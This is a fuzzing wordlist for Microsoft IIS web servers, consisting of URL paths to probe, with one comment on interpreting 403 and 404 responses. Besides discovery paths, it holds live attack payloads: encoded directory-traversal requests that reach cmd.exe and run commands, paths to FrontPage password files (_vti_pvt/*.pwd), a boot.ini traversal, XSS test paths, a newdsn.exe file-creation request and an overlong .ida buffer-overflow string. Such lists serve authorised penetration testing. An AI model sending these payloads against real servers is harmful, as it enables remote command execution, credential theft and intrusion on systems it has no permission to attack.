Fuzz – IS

/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir/a%5c.aspx

/AccessPlatform/

/AccessPlatform/auth/

/AccessPlatform/auth/clientscripts/

/AccessPlatform/auth/clientscripts/cookies.js 

/AccessPlatform/auth/clientscripts/login.js 

/admin/

/administration/

/administrator/

/Admin/knowledge/dsmgr/users/GroupManager.asp

/Admin/knowledge/dsmgr/users/UserManager.asp

/adovbs.inc

/adsamples/

/AdvWorks/equipment/catalog_type.asp

/ajfhasdfgsagfakjhgd

/archi~1/

/Archi~1/

/aspnet_files/

/asp/

/asps/

/ASPSamp/AdvWorks/equipment/catalog_type.asp

/_AuthChangeUrl?

/bin/

/bins/

/certcontrol/

/certenroll/

/certsrv/

/cfide/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir

/CFIDE/Administrator/startstop.html

/cgi

/cgi-bin/a1stats/a1disp.cgi

/cgi-bin/htimage.exe?2,2

/cgi-bin/htmlscript

/cgi-bin/imagemap.exe?2,2

/checkapache.html

/citrix/

/citrix/AccessPlatform/auth/

/citrix/AccessPlatform/auth/clientscripts/

/Citrix//AccessPlatform/auth/clientscripts/cookies.js 

/Citrix/AccessPlatform/auth/clientscripts/login.js 

/Citrix/PNAgent/config.xml

/clocktower

/cmsample/

/db/

/domcfg.nsf/?open

/Exadmin/

/Exchange/

/exchange/root.asp

/ExchWeb/

/forum_arc.asp

/forum.asp

/forum_professionnel.asp

/help/

/iiasdmpwd/

/iisadmin/

/iisadmpwd/achg.htr

/iisadmpwd/aexp2b.htr

/iisadmpwd/aexp2.htr

/iisadmpwd/aexp3.htr

/iisadmpwd/aexp4b.htr

/iisadmpwd/aexp4.htr

/iisadmpwd/aexp.htr

/iisadmpwd/anot3.htr

/iisadmpwd/anot.htr

/iishelp/

/iishelp/iis/misc/default.asp

/iissamples/

/iissamples/exair/howitworks/Code.asp

/iissamples/exair/howitworks/Codebrw1.asp

/iissamples/exair/howitworks/Codebrws.asp

/iissamples/sdk/asp/docs/codebrw2.asp

/iissamples/sdk/asp/docs/codebrws.asp

/iissamples/sdk/asp/docs/CodeBrws.asp

/imprimer.asp

/includes/adovbs.inc

/index.php

/index.shtml

/isapi/

/_layouts/alllibs.htm

/_layouts/settings.htm

/_layouts/userinfo.htm

# Look at the result codes in the headers – 403 likely mean the dir exists, 404 means not. It takes an ISAPI filter for IIS to return 404’s for 403s. 

/Mail/smtp/Admin/smadv.asp

/market

/_mem_bin/

/_mem_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir

/_mem_bin/autoconfig.asp

/_mem_bin/formslogin.asp

/Micros~1/

/Microsoft-Server-ActiveSync/

/msadc/

/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir

/msadc/Samples/selector/showcode.asp

/msdac/root.exe?/c+dir

/mspress30

/%NETHOOD%/

/null.htw

/null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHilite

/OMA/

/OWA/

/pbserver/pbserver.dll

/postinfo.html

/.printer

/_private

/progra~1

/Progra~1

/Public/

/publisher

/qwertypoiu.htw

/qwertypoiu.printer

/rubrique.asp

/samples/

/~/alert(‘XSS’).asp

/~/alert(‘XSS’).aspx

/alert(‘XSS’).aspx

/scripts/

/scripts/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir

/scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir+c:\\

/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\

/scripts/cgimail.exe

/scripts/convert.bas

/scripts/counter.exe

/scripts/fpcount.exe

/scripts/iisadmin/ism.dll?http/dir

/scripts/no-such-file.pl

/scripts/root.exe?/c+dir

/scripts/samples/search/webhits.exe

/scripts/tools/getdrvs.exe

/scripts/tools/newdsn.exe

/search?NS-query-pat=..\..\..\..\..\boot.ini

/share/

/SiteServer/Admin

/SiteServer/Admin/commerce/foundation/driver.asp

/SiteServer/Admin/commerce/foundation/DSN.asp

/SiteServer/admin/findvserver.asp

/SiteServer/Admin/knowledge/dsmgr/default.asp

/siteserver/publishing/viewcode.asp

/SiteServer/Publishing/viewcode.asp

/Sites/Knowledge/Membership/Inspiredtutorial/Viewcode.asp

/Sites/Knowledge/Membership/Inspired/ViewCode.asp

/Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp

/Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp

/Sites/Samples/Knowledge/Push/ViewCode.asp

/Sites/Samples/Knowledge/Search/ViewCode.asp

/test/

/tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=goatfart+samples+from+microsoft&dbq=..%2F..%2Fwwwroot%2goatfart.html&newdb=CREA

/tsweb/

/vc30

/_fpclass/

/_vti_adm/

/_vti_aut/

/_vti_bin/

/_vti_bin/

/_vti_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir

/_vti_bin/fpcount.exe?Page=default.asp|Image=3

/_vti_bin/shtml.dll

/_vti_bin/shtml.dll/asdfghjkl

/_vti_bin/shtml.exe/qwertyuiop

/_vti_bin/_vti_aut/dvwssr.dll

/_vti_bin/_vti_aut/fp30reg.dll

/_vti_bin/_vti_aut/fp30reg.dll?1234=X

/_vti_cnf/

/_vti_log/

/_vti_pvt/

/_vti_pvt/

/_vti_pvt/administrator.pwd

/_vti_pvt/administrators.pwd

/_vti_pvt/authors.pwd

/_vti_pvt/service.pwd

/_vti_pvt/shtml.exe

/_vti_pvt/users.pwd

/_vti_script

/_vti_txt

/_WEB_INF/

/WEB-INF/web.xml

/WebSer~1

/x.cfm

/x.htw

/x.htx

/x.ida

/x.ida?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=X

/x.idc

/x.idq

/x.pl

/x.shtml